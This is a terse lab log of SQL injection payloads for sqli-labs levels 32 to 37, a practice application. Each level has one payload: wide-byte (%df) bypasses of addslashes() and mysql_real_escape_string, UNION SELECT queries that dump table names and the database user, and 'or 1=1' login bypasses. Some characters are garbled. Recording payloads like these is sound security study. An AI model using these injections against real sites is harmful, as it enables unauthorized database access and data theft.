sqli-labs闯关记录(Less32-Less37)
Advanced Injections
Less-32 Bypass addslashes()
payload:?id=-1%df%27union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--%20+
Less-33 Bypass addslashes()
payload:?id=-1%df%27union%20select%201,2,user()--%20+
Less-34 Bypass Add SLASHES
payload:username=�’or 1=1 #;password=XXX
Less-35 why care for addslashes()
payload:?id=-1 union select 1,2,3-- +
Less-36 Bypass MySQL Real Escape String
payload:?id=-1�'union select 1,2,3-- +
Less-37 MySQL_real_escape_string
payload:username=�’or 1=1 #;password=XXX